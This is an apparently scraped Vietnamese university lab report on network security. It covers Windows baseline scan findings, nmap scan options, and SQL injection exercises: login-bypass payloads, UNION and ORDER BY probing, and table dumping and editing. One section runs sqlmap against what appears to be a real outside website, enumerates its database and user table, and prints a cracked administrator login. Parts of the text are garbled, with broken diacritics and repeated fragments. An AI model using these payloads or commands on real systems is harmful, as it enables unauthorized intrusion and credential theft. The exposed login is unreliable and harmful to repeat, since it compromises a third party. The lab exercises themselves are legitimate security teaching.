HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG ***** BÀI THỰC HÀNH: AN TOÀN MẠNG Giảng viên: TS Đặng Minh Tuấn 2021 MỤC LỤC I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ 1 Quét hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser 1.1 Hình ảnh chạy quét hệ thống chạy Windows 1.2 Phân tích kết quét Windows 2 Rà quét dịch vụ lỗ hổng sử dụng công cụ nmap II Tấn công chèn mã SQL Vượt qua khâu xác thực người dùng 1.1 Đăng nhập tự .7 1.3 Giải thích kết Trích xuất liệu từ CSDL 2.1 Tìm số trường câu truy vấn trang: 2.2 Hiển thị thông tin hệ quản trị CSDL hệ điều hành 11 2.3 Trích xuất danh sách bảng CSDL 12 2.4 Trích xuất danh sách trường bảng: 12 2.5 Trích xuất liệu bảng .15 Thêm, sửa, xóa liệu 17 3.1 Sửa 17 3.2 Thêm .18 3.3 Xóa 19 3.4 Khảo sát trang web mạng có lỗi chèn mã SQL (khơng sửa/xóa liệu) .20 I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ Quét hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser 1.1 Hình ảnh chạy quét hệ thống chạy Windows 1.2 Phân tích kết quét Windows Local Account Password Test: Có vài tài khoản người dùng khơng có mật mật yếu + Mức độ nguy hiểm: Cao + Cách khắc phục: Đặt mật mạnh (hơn ký tự gồm có ký tự thường ký tự in hoa, chữ số ký tự đặc biệt đan xen) Automatic Updates: Dịch vụ tự động cập nhật bị tắt + Mức độ nguy hiểm: Cao + Cách khắc phục: Bật dịch vụ đặt chế độ Automatic (Delayed Start) Password Expiration: Có vài tài khoản người dùng có mật khơng có thời hạn + Mức độ nguy hiểm: Trung bình + Cách khắc phục: Thay đổi mật đặt thời hạn cho mật tài khoản 2 Rà quét dịch vụ lỗ hổng sử dụng công cụ nmap Quét kết nối TCP: nmap –sT Quét kết nối UDP: nmap –sU Quét ARP ping: nmap –sP FIN Scan: nmap –sF XMAS Scan: nmap –sX Quét ICMP(ping): nmap –sN Quét dịch vụ phiên bản: nmap –sV Quét thông tin máy xác định hệ điều hành: nmap -sS -P0 -sV -O II Tấn công chèn mã SQL Vượt qua khâu xác thực người dùng 1.1 Đăng nhập tự 1.2 Đăng nhập vào tài khoản định 1.3 Giải thích kết Ở khâu đăng nhập tự ta có câu lệnh SQL là: SELECT TOP * FROM tbl_users WHERE username = 'a' AND password = 'aaaa' or 1=1 ' + Khi câu truy vấn thực tìm hàng tbl_users thỏa mãn hai điều kiện username = ‘a’ password =’aaaa’ 1=1 + Mà 1=1 ln nên câu truy vấn tìm hàng ta đăng nhập vào tài khoản hàng tbl_users Ở khâu đăng nhập vào tài khoản chi tiết ta có câu lệnh SQL là: SELECT TOP * FROM tbl_users WHERE username = 'david' ' AND password = '1' + Khi câu truy vấn thực tìm hàng có username = ‘david’ điều kiện lại nằm sau dấu ‘ ’ để comment nên bỏ qua + Trong tbl_user có username = ‘david’ nên ta đăng nhập vào hệ thống với tài khoản david mà không cần mật Trích xuất liệu từ CSDL 2.1 Tìm số trường câu truy vấn trang: ip%' order by 1; ip%' order by 2; ip%' order by 3; ip%' order by 4;  Có trường 10 ip%' union select '1', '2', '3'; 2.2 Hiển thị thông tin hệ quản trị CSDL hệ điều hành 11 2.3 Trích xuất danh sách bảng CSDL 2.4 Trích xuất danh sách trường bảng: tbl_user 12 tbl_test tbl_products 13 tbl_administrators students 14 2.5 Trích xuất liệu bảng tbl_user tbl_test 15 tbl_products tbl_administrators 16 students Thêm, sửa, xóa liệu 3.1 Sửa 17 Sửa password david thành test kết quả: 3.2 Thêm 18 Thêm tài khoản tom kết quả: 3.3 Xóa 19 Xóa tài khoản tom kết 3.4 Khảo sát trang web mạng có lỗi chèn mã SQL (khơng sửa/xóa liệu) Thực hành trang http://tapiocafeedfood.com sử dụng SQLMap Kali Linux Lệnh: sqlmap -u "http://tapiocafeedfood.com/?php=product_detail&id=300" –dbs 20 Kết ta nhận hai bảng dbs: “information_schema” “vietfarmgr_ha” Tiếp tục sử dụng lệnh: sqlmap -u "http://tapiocafeedfood.com/?php=product_detail&id=300" tables -D vietfarmgr_ha để truy cập vào trường database ta nhận trường: Kết ta tìm trường: tbl_config, tbl_content, tbl_content_category, tbl_product, tbl_product_category, tbl_product_new, | tbl_product_special, tbl_user, tbl_visitor 21 Tiếp tục sử dụng lệnh: sqlmap -u "http://tapiocafeedfood.com/?php=product_detail&id=300" columns -D vietfarmgr_ha -T tbl_user Kết quả: tìm cột 22 Truy cập tiếp tục vào trường bảng ta nhận username pwd dạng hashed → Decode ta nhận mật coder 123456789s 23 ... LỤC I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ 1 Quét hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser 1.1 Hình ảnh chạy quét. .. liệu) .20 I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ Quét hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser 1.1 Hình ảnh chạy quét hệ thống chạy... bình + Cách khắc phục: Thay đổi mật đặt thời hạn cho mật tài khoản 2 Rà quét dịch vụ lỗ hổng sử dụng công cụ nmap Quét kết nối TCP: nmap –sT Quét kết nối UDP: nmap –sU Quét ARP